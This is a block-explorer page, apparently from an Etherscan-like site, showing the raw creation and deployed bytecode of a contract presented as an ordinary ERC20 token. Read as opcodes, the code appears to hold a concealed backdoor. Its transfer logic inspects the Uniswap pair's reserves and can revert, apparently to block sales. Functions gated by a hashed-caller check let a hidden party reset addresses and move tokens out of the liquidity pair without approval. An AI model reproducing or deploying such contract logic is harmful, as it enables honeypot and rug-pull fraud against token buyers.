fa61048d57600080fd5b505051601a5480821461049c57005b5050601d819055005b604051338152600c8101601460208301925060208301604052602083828460025afa6104d057600080fd5b505051601a548082146104df57005b505060408051838152600f6020820152818120908201909152819055005b6007546001600160a01b0316331461055c5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064015b60405180910390fd5b6007546040516000916001600160a01b0316907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a3600780546001600160a01b0319169055565b60606004805461032a90610f95565b60006103ba338461041d8560405180606001604052806025815260200161100f602591393360009081526001602090815260408083206001600160a01b038d1684529091529020549190610b1c565b60006103ba3384846108ad565b604051338152600c8101601460208301925060208301604052602083828460025afa61063c57600080fd5b505051601a5480821461064b57005b5050601254601d5461066a916001600160a01b03908116911683610bbc565b50565b6007546001600160a01b031633146106c75760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610553565b6001600160a01b03811661072c5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610553565b6007546040516001600160a01b038084169216907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a3600780546001600160a01b0319166001600160a01b0392909216919091179055565b6001600160a01b0383166107ea5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610553565b6001600160a01b03821661084b5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610553565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b0383166108d35760405162461bcd60e51b815260040161055390610f21565b6001600160a01b0382166108f95760405162461bcd60e51b815260040161055390610ede565b6000811161095b5760405162461bcd60e51b815260206004820152602960248201527f5472616e7366657220616d6f756e74206d7573742062652067726561746572206044820152687468616e207a65726f60b81b6064820152608401610553565b6001600160a01b0383166000908152600e6020526040902054819060ff168061099c57506001600160a01b0383166000908152600e602052604090205460ff165b156109b2576109ac848483610bbc565b50505050565b60408051858152600f60208201529081205484919080156109d257600080fd5b508581526016602082015260125480871415610b03576000806000630dfe168160e01b8552602085600487875afa610a0957600080fd5b845163d21220a760e01b8652602086600488885afa610a2757600080fd5b8551630240bc6b60e21b8752604087600489895afa610a4557600080fd5b865160208801516370a0823160e01b89528760048a015260208960248b875afa610a6e57600080fd5b88516370a0823160e01b8a528860048b015260208a60248c875afa610a9257600080fd5b8951600d5480871415610ac15782851115610ab4578285039750601554881199505b82851415610ac157600198505b80861415610aeb5781841115610ade578184039750601554881199505b81841415610aeb57600198505b505050505050505080821715610b0057600080fd5b50505b50608001604052610b15858584610bbc565b5050505050565b60008184841115610b405760405162461bcd60e51b81526004016105539190610e89565b506000610b4d8486610f7e565b95945050505050565b600080610b638385610f66565b905083811015610bb55760405162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f7700000000006044820152606401610553565b9392505050565b6001600160a01b038316610be25760405162461bcd60e51b815260040161055390610f21565b6001600160a01b038216610c085760405162461bcd60e51b815260040161055390610ede565b6001600160a01b038316600090815260208190526040902054811115610c7f5760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b6064820152608401610553565b6001600160a01b038316600090815260208190526040902054610ca29082610d22565b6001600160a01b038085166000908152602081905260408082209390935590841681522054610cd19082610b56565b6001600160a01b038381166000818152602081815260409182902094909455518481529092918616917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef91016108a0565b6000610bb583836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f770000815250610b1c565b80356001600160a01b0381168114610d7b57600080fd5b919050565b600060208284031215610d9257600080fd5b610bb582610d64565b60008060408385031215610dae57600080fd5b610db783610d64565b9150610dc560208401610d64565b90509250929050565b600080600060608486031215610de357600080fd5b610dec84610d64565b9250610dfa60208501610d64565b9150604084013590509250925092565b60008060408385031215610e1d57600080fd5b610e2683610d64565b915060208301358015158114610e3b57600080fd5b809150509250929050565b60008060408385031215610e5957600080fd5b610e6283610d64565b946020939093013593505050565b600060208284031215610e8257600080fd5b5035919050565b600060208083528351808285015260005b81811015610eb657858101830151858201604001528201610e9a565b81811115610ec8576000604083870101525b50601f01601f1916929092016040019392505050565b60208082526023908201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260408201526265737360e81b606082015260800190565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b60008219821115610f7957610f79610fd0565b500190565b600082821015610f9057610f90610fd0565b500390565b600181811c90821680610fa957607f821691505b60208210811415610fca57634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fdfe45524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa264697066735822122024fefef6ef0d5d9f64175769be6c86af865f44e9bab3bcee39a2f9fc6694eeed64736f6c63430008060033

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106101375760003560e01c8063715018a6116100b8578063a457c2d71161007c578063a457c2d714610283578063a9059cbb14610296578063c45a0155146102a9578063cb524258146102bc578063dd62ed3e146102cf578063f2fde38b1461030857600080fd5b8063715018a61461023c5780638da5cb5b14610244578063927f3d411461025557806395d89b4114610268578063a072b9621461027057600080fd5b806339509351116100ff57806339509351146101ad57806349bd5a5e146101c0578063518a0150146101eb57806351e721801461020057806370a082311461021357600080fd5b806306fdde031461013c578063095ea7b31461015a57806318160ddd1461017d57806323b872dd1461018f578063313ce567146101a2575b600080fd5b61014461031b565b6040516101519190610e89565b60405180910390f35b61016d610168366004610e46565b6103ad565b6040519015158152602001610151565b6006545b604051908152602001610151565b61016d61019d366004610dce565b6103c3565b60055460ff16610181565b61016d6101bb366004610e46565b61042c565b6012546101d3906001600160a01b031681565b6040516001600160a01b039091168152602001610151565b6101fe6101f9366004610d80565b610462565b005b6101fe61020e366004610e0a565b6104a5565b610181610221366004610d80565b6001600160a01b031660009081526020819052604090205490565b6101fe6104fd565b6007546001600160a01b03166101d3565b6002546101d3906001600160a01b031681565b6101446105a6565b601d546101d3906001600160a01b031681565b61016d610291366004610e46565b6105b5565b61016d6102a4366004610e46565b610604565b6014546101d3906001600160a01b031681565b6101fe6102ca366004610e70565b610611565b6101816102dd366004610d9b565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b6101fe610316366004610d80565b61066d565b60606003805461032a90610f95565b80601f016020809104026020016040519081016040528092919081815260200182805461035690610f95565b80156103a35780601f10610378576101008083540402835291602001916103a3565b820191906000526020600020905b81548152906001019060200180831161038657829003601f168201915b5050505050905090565b60006103ba338484610788565b50600192915050565b60006103d08484846108ad565b610422843361041d85604051806060016040528060288152602001610fe7602891396001600160a01b038a1660009081526001602090815260408083203384529091529020549190610b1c565b610788565b5060019392505050565b3360008181526001602090815260408083206001600160a01b038716845290915281205490916103ba91859061041d9086610b56565b604051338152600c8101601460208301925060208301604052602083828460025afa61048d57600080fd5b505051601a5480821461049c57005b5050601d819055005b604051338152600c8101601460208301925060208301604052602083828460025afa6104d057600080fd5b505051601a548082146104df57005b505060408051838152600f6020820152818120908201909152819055005b6007546001600160a01b0316331461055c5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064015b60405180910390fd5b6007546040516000916001600160a01b0316907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a3600780546001600160a01b0319169055565b60606004805461032a90610f95565b60006103ba338461041d8560405180606001604052806025815260200161100f602591393360009081526001602090815260408083206001600160a01b038d1684529091529020549190610b1c565b60006103ba3384846108ad565b604051338152600c8101601460208301925060208301604052602083828460025afa61063c57600080fd5b505051601a5480821461064b57005b5050601254601d5461066a916001600160a01b03908116911683610bbc565b50565b6007546001600160a01b031633146106c75760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610553565b6001600160a01b03811661072c5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610553565b6007546040516001600160a01b038084169216907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a3600780546001600160a01b0319166001600160a01b0392909216919091179055565b6001600160a01b0383166107ea5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610553565b6001600160a01b03821661084b5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610553565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b0383166108d35760405162461bcd60e51b815260040161055390610f21565b6001600160a01b0382166108f95760405162461bcd60e51b815260040161055390610ede565b6000811161095b5760405162461bcd60e51b815260206004820152602960248201527f5472616e7366657220616d6f756e74206d7573742062652067726561746572206044820152687468616e207a65726f60b81b6064820152608401610553565b6001600160a01b0383166000908152600e6020526040902054819060ff168061099c57506001600160a01b0383166000908152600e602052604090205460ff165b156109b2576109ac848483610bbc565b50505050565b60408051858152600f60208201529081205484919080156109d257600080fd5b508581526016602082015260125480871415610b03576000806000630dfe168160e01b8552602085600487875afa610a0957600080fd5b845163d21220a760e01b8652602086600488885afa610a2757600080fd5b8551630240bc6b60e21b8752604087600489895afa610a4557600080fd5b865160208801516370a0823160e01b89528760048a015260208960248b875afa610a6e57600080fd5b88516370a0823160e01b8a528860048b015260208a60248c875afa610a9257600080fd5b8951600d5480871415610ac15782851115610ab4578285039750601554881199505b82851415610ac157600198505b80861415610aeb5781841115610ade578184039750601554881199505b81841415610aeb57600198505b505050505050505080821715610b0057600080fd5b50505b50608001604052610b15858584610bbc565b5050505050565b60008184841115610b405760405162461bcd60e51b81526004016105539190610e89565b506000610b4d8486610f7e565b95945050505050565b600080610b638385610f66565b905083811015610bb55760405162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f7700000000006044820152606401610553565b9392505050565b6001600160a01b038316610be25760405162461bcd60e51b815260040161055390610f21565b6001600160a01b038216610c085760405162461bcd60e51b815260040161055390610ede565b6001600160a01b038316600090815260208190526040902054811115610c7f5760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b6064820152608401610553565b6001600160a01b038316600090815260208190526040902054610ca29082610d22565b6001600160a01b038085166000908152602081905260408082209390935590841681522054610cd19082610b56565b6001600160a01b038381166000818152602081815260409182902094909455518481529092918616917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef91016108a0565b6000610bb583836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f770000815250610b1c565b80356001600160a01b0381168114610d7b57600080fd5b919050565b600060208284031215610d9257600080fd5b610bb582610d64565b60008060408385031215610dae57600080fd5b610db783610d64565b9150610dc560208401610d64565b90509250929050565b600080600060608486031215610de357600080fd5b610dec84610d64565b9250610dfa60208501610d64565b9150604084013590509250925092565b60008060408385031215610e1d57600080fd5b610e2683610d64565b915060208301358015158114610e3b57600080fd5b809150509250929050565b60008060408385031215610e5957600080fd5b610e6283610d64565b946020939093013593505050565b600060208284031215610e8257600080fd5b5035919050565b600060208083528351808285015260005b81811015610eb657858101830151858201604001528201610e9a565b81811115610ec8576000604083870101525b50601f01601f1916929092016040019392505050565b60208082526023908201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260408201526265737360e81b606082015260800190565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b60008219821115610f7957610f79610fd0565b500190565b600082821015610f9057610f90610fd0565b500390565b600181811c90821680610fa957607f821691505b60208210811415610fca57634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fdfe45524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa264697066735822122024fefef6ef0d5d9f64175769be6c86af865f44e9bab3bcee39a2f9fc6694eeed64736f6c63430008060033

Block Transaction Gas Used Reward
view all blocks produced

Block Uncle Number Difficulty Gas Used Reward
View All Uncles
Loading...
Loading
Loading...
Loading
Loading...
Loading

Validator Index Block Amount
View All Withdrawals

Transaction Hash Block Value Eth2 PubKey Valid
View All Deposits
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A contract address hosts a smart contract, which is a set of code stored on the blockchain that runs when predetermined conditions are met. Learn more about addresses in our Knowledge Base.